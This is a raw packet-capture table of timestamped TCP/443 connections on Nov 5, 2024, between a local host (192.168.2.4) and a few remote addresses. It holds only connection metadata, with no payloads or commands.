                                                                                                                                    Nov 5, 2024 09:03:17.957243919 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.957510948 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.957546949 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.957576036 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.957602978 CET49813443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.957611084 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.957658052 CET49813443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.957935095 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.958026886 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.958060980 CET49813443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.958066940 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.958189964 CET49813443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.958195925 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.958199978 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.958678961 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.958739996 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.958827019 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.958852053 CET49811443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.958858967 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.958954096 CET49811443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.958959103 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.959084988 CET49811443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.959331989 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.959583044 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.959614992 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.959655046 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.959682941 CET49811443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.959688902 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.959831953 CET49811443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.960071087 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.960370064 CET49811443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.992660046 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.992657900 CET49818443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.999242067 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.999392033 CET49813443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.999398947 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.011723042 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.011800051 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.011953115 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.011979103 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.011986971 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.012036085 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.012041092 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.012094975 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.012206078 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.012243032 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.012336016 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.012345076 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.013086081 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.013123035 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.013189077 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.013194084 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.013322115 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.013617992 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.013686895 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.013721943 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.013750076 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.013756037 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.013792992 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.013842106 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.013849020 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.013963938 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.014511108 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.041533947 CET49813443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.041544914 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.055838108 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.068456888 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.076636076 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.076709032 CET49813443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.076718092 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.076764107 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.076795101 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.076817989 CET49813443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.076828003 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.077173948 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.077276945 CET49813443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.077284098 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.077368975 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.077397108 CET49813443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.077507973 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.077668905 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.077697992 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.077727079 CET49811443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.077735901 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.077970028 CET49811443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.078028917 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.078175068 CET49811443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.078178883 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.078228951 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.079936981 CET49811443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.079942942 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.117551088 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.117563009 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.119910002 CET49811443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.165364981 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.433830023 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.433897972 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.433928967 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.433989048 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.434025049 CET49818443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.434030056 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.434040070 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.434052944 CET49818443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.434078932 CET49818443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.434087038 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.434120893 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.434150934 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.434186935 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.434209108 CET49818443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.434215069 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.434299946 CET49818443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.435050011 CET44349816142.250.185.132192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.435087919 CET44349816142.250.185.132192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.435453892 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.435518026 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.435530901 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.435544968 CET49816443192.168.2.4142.250.185.132
                                                                                                                                    Nov 5, 2024 09:03:18.435551882 CET44349816142.250.185.132192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.435570955 CET49813443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.435580969 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.435600042 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.435643911 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.435669899 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.435679913 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.435771942 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.435825109 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.435839891 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.435847044 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.435873985 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.436002970 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.436043024 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.436074018 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.436079979 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.436124086 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.436131954 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.436170101 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.436177015 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.436182976 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.436203957 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.436230898 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.436904907 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.436954975 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.436984062 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.436989069 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.437000036 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.437012911 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.437042952 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.437072992 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.437079906 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.437089920 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.437104940 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.437210083 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.437216997 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.437869072 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.437920094 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.437926054 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.437938929 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.437947035 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.437968016 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.437983036 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.437983036 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.437990904 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.438011885 CET49813443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.438019991 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.438020945 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.438031912 CET49813443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.438051939 CET49813443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.438050985 CET49811443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.438057899 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.438086987 CET49811443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.438110113 CET49811443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.438817024 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.438853979 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.438919067 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.438946962 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.438947916 CET49811443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.438955069 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.438960075 CET44349816142.250.185.132192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.438978910 CET49811443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.439013004 CET49813443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.439014912 CET49816443192.168.2.4142.250.185.132
                                                                                                                                    Nov 5, 2024 09:03:18.439018965 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.439747095 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.439835072 CET49813443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.439841032 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.439862013 CET44349814104.17.24.14192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.439882040 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.439905882 CET44349814104.17.24.14192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.439907074 CET49813443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.439933062 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.439939976 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.439940929 CET44349814104.17.24.14192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.439965010 CET49814443192.168.2.4104.17.24.14
                                                                                                                                    Nov 5, 2024 09:03:18.439975023 CET44349814104.17.24.14192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.440002918 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.440010071 CET44349814104.17.24.14192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.440035105 CET49814443192.168.2.4104.17.24.14
                                                                                                                                    Nov 5, 2024 09:03:18.440041065 CET44349814104.17.24.14192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.440074921 CET44349814104.17.24.14192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.440099001 CET49814443192.168.2.4104.17.24.14
                                                                                                                                    Nov 5, 2024 09:03:18.440104961 CET44349814104.17.24.14192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.440140009 CET44349814104.17.24.14192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.440171957 CET49814443192.168.2.4104.17.24.14
                                                                                                                                    Nov 5, 2024 09:03:18.440180063 CET44349814104.17.24.14192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.440526962 CET44349819162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.440666914 CET49814443192.168.2.4104.17.24.14
                                                                                                                                    Nov 5, 2024 09:03:18.440896988 CET44349814104.17.24.14192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.440948009 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.441076994 CET49813443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.441512108 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.441553116 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.441553116 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.441584110 CET49811443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.441586971 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.441586971 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.441596985 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.441615105 CET49813443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.441616058 CET49811443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.441622019 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.441623926 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.441647053 CET49813443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.441653967 CET49811443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.441658974 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.441684961 CET49811443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.442425966 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.442464113 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.442492962 CET49813443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.442497015 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.442497969 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.442500114 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.442528009 CET49811443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.442532063 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.442539930 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.442544937 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.442548990 CET49818443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.442554951 CET49811443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.442555904 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.442558050 CET49813443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.442567110 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.442576885 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.442581892 CET49813443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.442591906 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.442606926 CET49818443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.442612886 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.442636967 CET49813443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.442641973 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.442667961 CET49818443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.442729950 CET44349825162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.442795038 CET49813443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.443429947 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.443469048 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.443487883 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.443491936 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.443514109 CET49818443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.443517923 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.443521976 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.443543911 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.443563938 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.443568945 CET49818443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.443572998 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.443573952 CET49811443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.443573952 CET49811443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.443581104 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.443600893 CET49818443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.444292068 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.444335938 CET49818443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.444340944 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.444356918 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.444430113 CET49813443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.444437981 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.444480896 CET44349826162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.444489956 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.444511890 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.444556952 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.444570065 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.444575071 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.444596052 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.444618940 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.444703102 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.444706917 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.445389032 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.445415020 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.445441008 CET49818443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.445441961 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.445441961 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.445458889 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.445491076 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.445494890 CET49818443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.445499897 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.445535898 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.445545912 CET49818443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.445549965 CET44349818162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.445589066 CET49818443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.445590973 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.445650101 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.445674896 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.445679903 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.445708036 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.445993900 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.446588039 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.446659088 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.446661949 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.446670055 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.446707010 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:18.446732044 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:18.446738958 CET44349817162.159.140.34192.168.2.4
